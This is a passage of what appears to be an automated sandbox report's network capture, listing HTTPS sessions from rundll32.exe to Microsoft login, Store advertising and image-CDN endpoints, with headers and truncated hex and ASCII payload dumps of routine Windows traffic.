                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:06 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:06 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: 87417ef1-d4b1-407f-88b0-6e0fc98de4e7
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02PF6E02DB19C V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:06 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 11316
                                                                                                                                                                                    2023-01-05 07:57:06 UTC245INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    15192.168.2.44971120.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:06 UTC256OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 4796
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:06 UTC257OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:06 UTC266INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:06 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: d82a3d6d-14ab-431f-a70e-fa8aaa3f90b3
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02PFA43EFA562 V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:06 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 11093
                                                                                                                                                                                    2023-01-05 07:57:06 UTC267INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    16192.168.2.44971020.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:06 UTC261OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 4796
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:06 UTC262OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:06 UTC278INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:06 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: 3a8663b2-74de-4b45-8944-56b070b1fbd9
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02PF8715263B1 V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:06 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 11093
                                                                                                                                                                                    2023-01-05 07:57:06 UTC278INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    17192.168.2.44971520.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:46 UTC289OUTGET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHVN5&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075735Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:46 UTC290INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: 3a861b8c-e77e-4249-88dd-f4dd56e9d693
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:46 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    18192.168.2.44971620.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:47 UTC290OUTGET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9P1J8S7CCWWT&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075736Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:47 UTC291INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: 46c2ac1b-fb39-4f9d-9a1e-5017b32b325a
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:46 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    19192.168.2.44971720.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:47 UTC291OUTGET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9P6RC76MSMMJ&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075736Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:47 UTC291INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: 62fcc2c4-4b42-4d67-bc1c-08987b510673
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:46 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    2192.168.2.44969580.67.82.235443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:56:52 UTC88OUTGET /cms/api/am/imageFileData/RE5cm11?ver=958c HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                                                    Host: img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:56:52 UTC88INHTTP/1.1 200 OK
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Last-Modified: Wed, 04 Jan 2023 09:08:13 GMT
                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                    X-ActivityId: 35449d8a-a956-45a7-b8b3-399a5444cb8c
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                    Content-Length: 2626
                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                    Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RE5cm11?ver=958c
                                                                                                                                                                                    X-Source-Length: 2626
                                                                                                                                                                                    Cache-Control: public, max-age=349822
                                                                                                                                                                                    Expires: Mon, 09 Jan 2023 09:07:14 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:56:52 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:56:52 UTC89INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 03 00 00 00 4e a3 7e 47 00 00 02 d3 50 4c 54 45 1d b9 54 23 ba 58 35 c0 66 48 c6 74 54 ca 7e 5f cd 86 6a d1 8f 70 d2 93 73 d3 95 77 d5 98 75 d4 97 72 d3 94 6e d2 91 66 cf 8b 5b cc 82 50 c8 7a 41 c4 6f 2f be 62 1e b9 55 39 c1 69 6d d1 91 99 df b1 c1 ec d0 e9 f8 ee ff ff ff fb fd fc db f4 e4 b2 e7 c5 8a da a6 5a cb 82 28 bc 5c af e6 c2 e7 f7 ed fd fe fd d4 f1 de 97 de b0 56 ca 7f 22 ba 58 33 bf 64 7d d6 9d c9 ee d6 fe fe fe f3 fb f6 ae e6 c1 61 ce 87 20 ba 56 63 ce 89 bd ea cd ef fa f2 9c e0 b4 43 c4 70 2b bd 5e 86 d9 a3 e7 f7 ec c7 ed d4 60 cd 86 2d be 60 96 de af f4 fb f6 6b d1 8f 27 bc 5c 90 dc ab d8 f3 e2 63 ce 88 e8 f8 ee c4 ec d2 44 c5 72 42 c4 70 cc ef d8 fc fe fc 98 df b1 25
                                                                                                                                                                                    Data Ascii: PNGIHDR,,N~GPLTET#X5fHtT~_jpswurnf[PzAo/bU9imZ(\V"X3d}a VcCp+^`-`k'\cDrBp%


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    20192.168.2.44971820.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:48 UTC291OUTGET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NH2GPH4JZS4&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075737Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:48 UTC292INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: 4dbaa110-67b9-4d68-8189-98446d94870f
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:47 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    21192.168.2.44971920.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:48 UTC292OUTGET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH5L9XT&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075737Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:48 UTC293INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: f8cdc26c-54d4-42d3-a6fd-4139c4305ef0
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:48 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    22192.168.2.44972020.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:49 UTC293OUTGET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681885&cid=128000000003678769&tid=700342085&reqasid=0e5fea829d184a55badf9714f679f032&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRF0083&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=e1fa4ce255404d92bcfa543339479a52&time=20230105T075738Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:49 UTC294INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: e39a4160-eb98-4c3b-967c-e3e3f6498275
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:48 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    23192.168.2.44972120.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:49 UTC294OUTGET /v1/a/impression?CID=128000000003678769&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=425681885&UIT=M-&TargetID=700342085&AN=504366868&PG=PC000P0FR5.0000000IQ8&REQASID=71556A9323DB45B28A3108EE5D06049B&UNID=314559&ID=00000000000000000000000000000001&ASID=e1fa4ce255404d92bcfa543339479a52&REQT=20230105T075648&TIME=20230105T075738Z&RV=&RS=&DEVOSVER=10.0.17134.1&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=0e5fea829d184a55badf9714f679f032&WFIDS=&ER_AC=&ARCRAS=&CLR=CDM HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:50 UTC295INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: f55d45ec-ab68-4384-b31f-9cbcc86ac152
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:49 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    24192.168.2.44972220.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:50 UTC295OUTGET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=314559&placementType=PostOOBE&app=&pid=425681888&cid=128000000003871249&tid=700342084&reqasid=34309a4234a64eed9bf34cb1d61fabc7&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ3P2&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=46e973b2872c43498ef85ee06e49e152&time=20230105T075739Z HTTP/1.1
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                    Host: eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:57:50 UTC295INHTTP/1.1 204 No Content
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    request-id: a12b992d-a476-463d-bc06-8499bcc3640b
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:50 GMT
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    25192.168.2.44972320.65.78.40443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
